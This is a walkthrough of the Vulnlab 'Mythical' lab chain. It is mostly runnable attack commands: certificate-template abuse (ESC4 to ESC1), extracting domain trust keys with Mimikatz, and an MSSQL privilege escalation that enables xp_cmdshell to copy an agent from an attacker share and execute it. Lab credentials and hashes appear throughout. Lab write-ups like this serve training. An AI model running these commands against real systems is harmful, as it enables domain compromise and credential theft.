VL-Mythical

Vulnlab Mythical CHAIN - Penetration Testing Walkthrough

In this comprehensive VulnLab walkthrough, I’ll guide you through exploiting the “Mythical CHAIN” network infrastructure, showcasing a realistic enterprise penetration testing scenario across multiple Windows domains. Starting with an assumed breach position, we’ll leverage a Mythic C2 agent to discover and exploit a chain of vulnerabilities including vulnerable certificate templates (ESC4/ESC1), Active Directory domain trusts, and SQL Server privilege escalation techniques. This penetration test demonstrates advanced lateral movement, credential harvesting, and domain privilege escalation tactics while highlighting the importance of proper certificate template security and trust relationship configurations in Active Directory environments.

Initial Reconnaissance

Starting with our first machine discovery:

PORT     STATE SERVICE       REASON          VERSION
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.mythical-us.vl
| Issuer: commonName=dc01.mythical-us.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-28T15:12:13
| Not valid after:  2025-05-30T15:12:13
| MD5:   ba60:dfbc:1933:a166:8d8b:c162:b60f:7716
| SHA-1: 666e:a128:ab04:d46a:5610:1836:8eb8:e4f8:bf5d:76bf

Second machine port scan results:

PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp   open  http     syn-ack ttl 63 Golang net/http server
7443/tcp open  ssl/http syn-ack ttl 62 nginx 1.25.5
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: 400 The plain HTTP request was sent to HTTPS port
|_Requested resource was /new/login
| ssl-cert: Subject: organizationName=Mythic
| Issuer: organizationName=Mythic
| Public Key type: ec
| Public Key bits: 384
| Signature Algorithm: ecdsa-with-SHA384
| Not valid before: 2024-11-24T15:26:17
| Not valid after:  2025-11-24T15:26:17
| MD5:   bc51:3614:2940:10c1:3fc7:fb2b:f260:7b09
| SHA-1: a844:a1a0:9f51:4d03:6d59:00cd:3fe4:2811:d1ec:d967
|_-----END CERTIFICATE-----

Third machine details:

PORT     STATE SERVICE       REASON          VERSION
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MYTHICAL-EU
|   NetBIOS_Domain_Name: MYTHICAL-EU
|   NetBIOS_Computer_Name: DC02
|   DNS_Domain_Name: mythical-eu.vl
|   DNS_Computer_Name: dc02.mythical-eu.vl
|   DNS_Tree_Name: mythical-eu.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-19T19:16:53+00:00
|_ssl-date: 2025-04-19T19:17:00+00:00; -1h59m43s from scanner time.

Initial Access - Mythic C2

Accessing the Mythic C2 interface at: https://<Machine 2 IP>:7443/new/login

From the assumed breach, we received these credentials:

mythic_admin : wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX

Command Execution and Enumeration

After logging in, we begin sending commands to our agent:

First, we change directory to the user’s home folder:

sleep 0 0

register_assembly SharpHound.exe

execute_assembly SharpHound.exe -c All

Then wait for SharpHound to finish and download the results:

download 20250419124353_BloodHound.zip

We send our data to BloodHound Community Edition (BHCE) for analysis. For reference on installing BHCE with Docker, see: https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf
From BloodHound analysis, we discover that user Momo has RDP access:

Network Share Enumeration

Let’s find what shares we have access to. First, we need to navigate to:

C:\_admin\cwrsync\bin

List available shares:

shell rsync.exe --list-only rsync://192.168.25.1

Now we’ll create a folder and copy the contents of the mythical share:

shell mkdir \hello

shell rsync -av rsync://192.168.25.1/mythical /

We discover a flag:

Credential Recovery

To download the it.kdbx file, we click the actions button and then download. The agent sends a task and the response enables downloading the file.
KeePass version 4 requires special handling as keepass2john doesn’t support it. We’ll use a GitHub repository with a bash script for brute-forcing:

https://github.com/r3nt0n/keepass4brute

From the wiki, we know the password should be in one of the smaller rockyou lists:

./keepass4brute.sh ../it.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt

Inside the KeePass database, we find credentials for a user named domjoin:

Certificate Template Exploitation

Let’s check for vulnerable certificate templates. We’ll use Certify, which needs to be compiled for Windows (Visual Studio 2019 with .NET 4):

register_assembly Certify.exe

execute_assembly Certify.exe find /vulnerable

Output reveals a vulnerable template:

[!] Vulnerable Certificates Templates :

    CA Name                               : dc01.mythical-us.vl\mythical-us-DC01-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions

We’ve identified an ESC4 vulnerability. To exploit it, we’ll impersonate the domjoin user:

make_token mythical-us\domjoin <PASS>

Next, we’ll upload StandIn to create a computer account and join the domain:

register_assembly StandIn_v13_Net45.exe

execute_assembly StandIn_v13_Net45.exe --computer panosoiko --make

Impersonate the machine account we created:

make_token mythical-us\panosoiko$ zgbyv9HgwnfF2QV

With our machine account context, we’ll convert the ESC4 vulnerability to ESC1:

execute_assembly StandIn_v13_Net45.exe --ADCS --filter Machine --ess --add

Successfully added the msPKI-Certificate-Name-Flag to the certificate. Now add Certificate Enrollment Permissions to the Domain Users group:

execute_assembly StandIn_v13_Net45.exe --ADCS --filter Machine --ntaccount
"mythical-us\domain users" --enroll --add

Now exploit the ESC1 vulnerability using Certify:

execute_assembly Certify.exe request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:administrator@mythical-us.vl

Certificate to NTLM Hash

Load Rubeus for ticket manipulation:

register_assembly Rubeus.exe

Save the Certify output to a cert.pem file and convert it:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Upload the certificate:

upload -File (path)cert.pfx

Use Rubeus to extract the Administrator’s NTLM hash:

execute_assembly Rubeus.exe asktgt /user:Administrator /certificate:c:\users\momo.ayase\admin.pfx /ptt /nowrap /getcredentials|

Obtained hash: C583EF48C5ED66NOPENOPENOPE
Since Mimikatz didn’t work, we’ll use Invoke-SMBExec.ps1 to trigger the agent with admin privileges:

powershell Invoke-SMBExec -Target 127.0.0.1 -Domain mythical-us.vl -Username administrator -Hash <HASH> -Command "c:\programdata\google\update.exe"

Domain Trust Exploitation

After uploading Mimikatz again, we’ll dump the domain trust information to explore the relationship with DC02:

shell C:/Users/Administrator/mimikatz.exe "lsadump::trust /patch"

Output reveals trust details:

Domain: MYTHICAL-EU.VL (MYTHICAL-EU / S-1-5-21-1148612195-3581135157-3534241443)
 [  In ] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [ Out ] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 4/20/2025 7:02:21 AM - CLEAR   - e6 39 a6 04 66 75 38 7d 33 a6 13 ce 4f 66 cf f9 fc 9f c4 79 6d f7 cc 0a 0e 51 5a 34 59 5a e9 79 4f ad 90 d6 c1 95 47 66 00 fe 65 02 4c b4 b3 8e 8f b1 31 07 af 43 5e 39 be 1a aa ac ed 06 70 3a 86 5c 48 76 3d f5 f5 a8 f2 57 08 fd 42 0a 6d 32 3b f6 5e 5f ac 62 94 4b 91 e7 d8 3c 3e ea c8 b4 07 f8 f7 ce 35 8a 99 8c 60 23 b4 df 63 fc a5 5a a7 57 26 da 76 eb 22 ec f7 4b e2 55 21 7c 6a 43 65 3f fd 1b 43 49 53 9f 5e 14 e4 c6 13 42 af 93 a1 4d 24 07 f8 91 28 10 d6 b7 70 59 ac fb c2 f7 22 aa d0 d7 f2 2c c2 24 cb 44 b0 3b 64 89 46 a8 9b 9c 78 ef 7f 5e e1 7d 11 5d 1f 98 4c 12 8b dd 89 5d c5 2b ce 8c eb ff bb 76 0e 2a 98 0c 0b 51 b8 c3 5e 74 2d 7a 87 4d 6b 67 4a 0c 45 4f b6 fe a9 05 2f 60 2b c9 bf 76 ba 78 7a 66 89 61 29 52 
	* aes256_hmac       a1757854f414bcd2aefc48cd445abae179806110cf763f255b5032f36ae4f1c3
	* aes128_hmac       f9b024c28fee48b95fd0fc27546affc9
	* rc4_hmac_nt       d96d7d0a04d48ee91ab49a97c012fefd

 [ In-1] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [Out-1] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 4/20/2025 7:02:21 AM - CLEAR   - a1 39 02 5e 0a 3d ce c0 af c9 6a ab 1c ea 0a 0a 7e 3f 20 d2 ea f6 95 93 c2 9f f8 7e 
	* aes256_hmac       cecbd91e50ff3ee7fbd725fbe9e2f3ea4d4445e549100607c3f2239307391076
	* aes128_hmac       652888ee3ab5fac7ea1ebf84e423d59d
	* rc4_hmac_nt       eb921a2b0e9d626559dab0f54fdc6498

Additional trust information:

Direction               : Outbound
DisallowTransivity      : False
DistinguishedName       : CN=mythical-eu.vl,CN=System,DC=mythical-us,DC=vl
ForestTransitive        : False
IntraForest             : False
IsTreeParent            : False
IsTreeRoot              : False
Name                    : mythical-eu.vl
ObjectClass             : trustedDomain
ObjectGUID              : 03ce402a-bf80-4b34-81dd-53cbe802337d
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source                  : DC=mythical-us,DC=vl
Target                  : mythical-eu.vl
TGTDelegation           : False
TrustAttributes         : 4
TrustedPolicy           : 
TrustingPolicy          : 
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

We discover that users from mythical-eu.vl can authenticate to mythical-us.vl, but not vice versa - a one-way trust. Following GitHub guidance, we exploit trust accounts:

execute_assembly -Assembly Rubeus.exe -Arguments asktgt /user:mythical-us$ /domain:mythical-eu.vl /rc4:d96d7d0a04d48ee91ab49a97c012fefd /nowrap /ptt

Now we can enumerate users on mythical-eu.vl:

powershell get-aduser -Filter * -Server mythical-eu.vl -Properties *

get-aduser -Filter * -Server "dc02.mythical-eu.vl" -Property DisplayName, SamAccountName | Select-Object DisplayName, SamAccountName0

Results reveal service accounts that might be exploitable:

DisplayName      SamAccountName  
-----------      --------------  
                 Administrator        
Wendy Adams      Wendy.Adams     
William Jennings William.Jennings
Julie Khan       Julie.Khan      
Alan Rhodes      Alan.Rhodes     
Jay Little       Jay.Little      
Owen Dunn        Owen.Dunn       
Howard Frost     Howard.Frost    
Naomi Campbell   Naomi.Campbell  
Judith Smith     Judith.Smith    
Nicholas Hill    Nicholas.Hill   
Karl Kaur        Karl.Kaur       
Hilary Pearson   Hilary.Pearson  
Marcus Elliott   Marcus.Elliott  
Fiona Knight     Fiona.Knight    
Jay Miller       Jay.Miller      
Josephine Smith  Josephine.Smith 
Mohammad Jones   Mohammad.Jones  
Glen Price       Glen.Price      
Amber Hussain    Amber.Hussain   
Megan Higgins    Megan.Higgins   
Donald Burton    Donald.Burton   
Jasmine Smith    Jasmine.Smith   
Kim Byrne        Kim.Byrne       
Jack Chambers    Jack.Chambers   
Danielle Andrews Danielle.Andrews
svc_ldap         svc_ldap        
svc_sql          svc_sql         
root             root            

The svc_sql and svc_ldap accounts look promising. We search for SPNs but find none:

powershell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server dc02.mythical-eu.vl | Select Name, ServicePrincipalName

DC02 Share Enumeration

Let’s search through DC02 shares:

shell net view \\dc02.mythical-eu.vl\

We spot a non-standard “dev” share. Let’s explore it:

ls \\dc02.mythical-eu.vl\dev

We find:

Autologon64.exe
getusers.exe

Using DNSpy to analyze these executables, we discover credentials:

svc_ldap : <PASS>

Port Scanning and SQL Server Access

Using PortScanner to check for MSSQL ports on DC02:

execute_assembly -Assembly PortScanner.exe -Arguments hosts=10.10.161.167 ports=1433,1434 timeout=3000

We find port 1433 open, indicating MSSQL is running. Password spraying reveals svc_sql has the same password as svc_ldap:

make_token mythical-eu\svc_sql <PASS>

Upload sqlcmd and rename it to avoid issues:

cp -Source C:/Users/Administrator/sqlcmd.exe -Destination C:/Users/Administrator/sql.exe

Successfully connecting to SQL Server:

Attempting to enable xp_cmdshell fails due to insufficient permissions:

SQL Server Privilege Escalation

Checking our current privileges:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');"

We attempt to find users we can impersonate:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"

Listing database owners:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"

We will escalate from svc_sql to dbo following SQL privilege escalation techniques:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT name, is_trustworthy_on FROM sys.databases WHERE name = 'msdb';"

Create a malicious stored procedure in msdb:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MYTHICAL-EU\svc_sql', 'sysadmin';"

Execute the stored procedure:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "EXEC sp_elevate_me;"

Verify sysadmin role:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT IS_SRVROLEMEMBER('sysadmin');"

Enable xp_cmdshell:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';"

We are running as nt service\mssql$sqlexpress.

Payload Deployment

Create a share for our agent:

mkdir -Path C:\hello

shell net share hello=C:\hello /grant:everyone,full

cp -Source C:/programdata/google/update.exe -Destination C:/hello/update.exe

Copy from the share to DC02:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC xp_cmdshell 'copy \\10.10.139.85\hello\update.exe C:\Windows\Temp\update.exe';"

Execute it:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC xp_cmdshell 'C:\Windows\Temp\update.exe';"

Privilege Escalation to SYSTEM

Since we’re running as a service, we have the SeImpersonatePrivilege enabled. We’ll use EfsPotato since SweetPotato doesn’t work:

register_assembly EfsPotato.exe

execute_assembly EfsPotato.exe \\10.10.139.85\hello\update.exe

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣤⣤⣤⣤⣄⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⠶⣻⠝⠋⠠⠔⠛⠁⡀⠀⠈⢉⡙⠓⠶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⢋⣴⡮⠓⠋⠀⠀⢄⠀⠀⠉⠢⣄⠀⠈⠁⠀⡀⠙⢶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⢁⣔⠟⠁⠀⠀⠀⠀⠀⠈⡆⠀⠀⠀⠈⢦⡀⠀⠀⠘⢯⢢⠙⢦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡼⠃⠀⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀⠀⠀⢳⣦⡀⠀⠀⢯⠀⠈⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⠆⡄⢠⢧⠀⣸⠀⠀⠀⠀⠀⠀⠀⢰⠀⣄⠀⠀⠀⠀⢳⡈⢶⡦⣿⣷⣿⢉⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣯⣿⣁⡟⠈⠣⡇⠀⠀⢸⠀⠀⠀⠀⢸⡄⠘⡄⠀⠀⠀⠈⢿⢾⣿⣾⢾⠙⠻⣾⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⡿⣮⠇⢙⠷⢄⣸⡗⡆⠀⢘⠀⠀⠀⠀⢸⠧⠀⢣⠀⠀⠀⡀⡸⣿⣿⠘⡎⢆⠈⢳⣽⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢠⡟⢻⢷⣄⠀⠀⠀⠀⠀⠀⣾⣳⡿⡸⢀⣿⠀⠀⢸⠙⠁⠀⠼⠀⠀⠀⠀⢸⣇⠠⡼⡤⠴⢋⣽⣱⢿⣧⠀⢳⠈⢧⠀⢻⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢀⡿⣠⡣⠃⣿⠃⠀⠀⠀⠀⣸⣳⣿⠇⣇⢸⣿⢸⣠⠼⠀⠀⠀⡇⠀⡀⠉⠒⣾⢾⣆⢟⣳⡶⠓⠶⠿⢼⣿⣇⠈⡇⠘⢆⠈⢿⡘⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠈⢷⣍⣤⡶⣿⡄⠀⠀⠀⢠⣿⠃⣿⠀⡏⢸⣿⣿⠀⢸⠀⠀⢠⡗⢀⠇⠀⢠⡟⠀⠻⣾⣿⠀⠀⠀⠀⡏⣿⣿⡀⢹⡀⠈⢦⠈⢷⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢁⣤⣄⠁⠀⠀⠀⣼⡏⢰⣟⠀⣇⠘⣿⣿⣾⣾⣆⢀⣾⠃⣼⢠⣶⣿⣭⣷⣶⣾⣿⣤⠀⠀⠀⡇⡯⣍⣧⠀⣷⠄⠈⢳⡀⢻⡁⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠺⣿⡿⠀⠀⠀⠀⡿⢀⣾⣧⠀⡗⡄⢿⣿⡙⣽⣿⣟⠛⠚⠛⠙⠉⢹⣿⣿⣦⠀⢸⡿⠀⠀⠀⢰⡯⣌⢻⡀⢸⢠⢰⡄⠹⡷⣿⣦⣤⠤⣶⡇⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⣇⣾⣿⢸⢠⣧⢧⠘⣿⡇⠸⣿⢿⡆⠀⠀⠀⠀⠘⣯⠇⣿⠂⣸⢰⠀⠀⢀⣸⡧⣊⣼⡇⢸⣼⣸⣷⢣⢻⣄⠉⠙⠛⠉⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣳⣤⣴⣿⣏⣿⣾⢸⣿⡘⣧⣘⢿⣀⡙⣞⠁⠀⠀⠀⠀⢀⡬⢀⣉⢠⣧⡏⠀⠀⡎⣿⣿⣿⣿⠃⣸⡏⣿⣿⡎⢿⡘⡆⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⣠⣼⣿⣿⣿⣼⣿⣧⢿⣿⣿⣯⡻⠟⠀⠀⠀⠀⠀⠐⢯⠣⡽⢟⣽⠀⠀⢘⡇⣿⣿⣿⡟⣴⣿⣷⣿⣿⣧⣿⣷⡽⠀⠀⠀⠀⠀⠀⠀
⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣼⣹⣿⣇⣸⣿⣿⣿⣻⣚⣿⡿⣿⣿⣦⣤⣀⡉⠃⠀⢀⣀⣤⡶⠛⡏⠀⢀⣼⢸⣿⣿⣿⣿⣿⣿⣿⢋⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀
⣿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠒⠒⠒⢭⢻⣽⣿⣿⣿⣿⣿⣿⢿⠿⣿⡏⠀⡼⠁⣀⣾⣿⣿⣿⣿⡿⣿⣿⣟⡻⣿⣿⡿⠣⠟⠀⠀⠀⠀⠀⠀⠀⠀
⠸⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢧⢿⣯⡽⠿⠛⠋⣵⢟⣋⣿⣶⣞⣤⣾⣿⣿⡟⢉⡿⢋⠻⢯⡉⢻⡟⢿⡅⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⡞⣿⣆⡀⠀⡼⡏⠉⠚⠭⢉⣠⠬⠛⠛⢁⡴⣫⠖⠁⠀⠀⣩⠟⠁⣸⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠈⢷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣽⣿⣿⣾⠳⡙⣦⡤⠜⠊⠁⠀⣀⡴⠯⠾⠗⠒⠒⠛⠛⠛⠛⠛⠓⠿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠘⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢷⣻⣿⣿⠔⢪⠓⠬⢍⠉⣩⣽⢻⣤⣶⣦⠀⠀⠀⢀⣀⣤⣴⣾⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠹⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣾⡏⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣯⣿⣿⠀⠀⣇⠀⣠⠎⠁⢹⡎⡟⡏⣷⣶⠿⠛⡟⠛⠛⣫⠟⠉⢿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣷⠈⢷⡤⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣾⣷⡀⣀⣀⣷⡅⠀⠀⠈⣷⢳⡇⣿⠀⠀⣸⠁⢠⡾⣟⣛⣻⣟⡿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢯⢻⣏⡵⠿⠿⢤⣄⠀⢀⣿⢸⣹⣿⣀⣴⣿⣴⣿⣛⠋⠉⠉⡉⠛⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⡎⣿⣥⣶⠖⢉⣿⡿⣿⣿⡿⣿⣟⠿⠿⣿⣿⣿⡯⠻⣿⣿⣿⣷⡽⣿⡗⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠸⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡘⣿⣩⠶⣛⣋⡽⠿⣷⢬⣙⣻⣿⣿⣿⣯⣛⠳⣤⣬⡻⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀
⠀⣿⣛⣻⣿⡿⠿⠟⠗⠶⠶⠶⠶⠤⠤⢤⠤⡤⢤⣤⣤⣤⣤⣄⣀⣀⣀⣀⣀⣀⣀⣀⣣⢹⣷⣶⣿⣿⣦⣴⣟⣛⣯⣤⣿⣿⣿⣿⣿⣷⣌⣿⣿⣿⣿⣿⣿⣿⣤⣤⣤⣤⣤⣤⣄
⠀⠉⠙⠛⠛⠛⠛⠛⠻⠿⠿⠿⠷⠶⠶⢶⣶⣶⣶⣶⣤⣤⣤⣤⣤⣥⣬⣭⣭⣉⣩⣍⣙⣏⣉⣏⣽⣶⣶⣶⣤⣤⣬⣤⣤⣾⣿⠶⠾⠿⠿⠿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠃
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠉⠉⠉⠉⠛⠛⠛⠛⠛⠛⠋⠉⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

The flag is in memory (user “root”).

mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Search around you will find the flag :0
https://api.vulnlab.com/api/v1/share?id=a325bfee-e9a7-49f2-9646-494f10841eef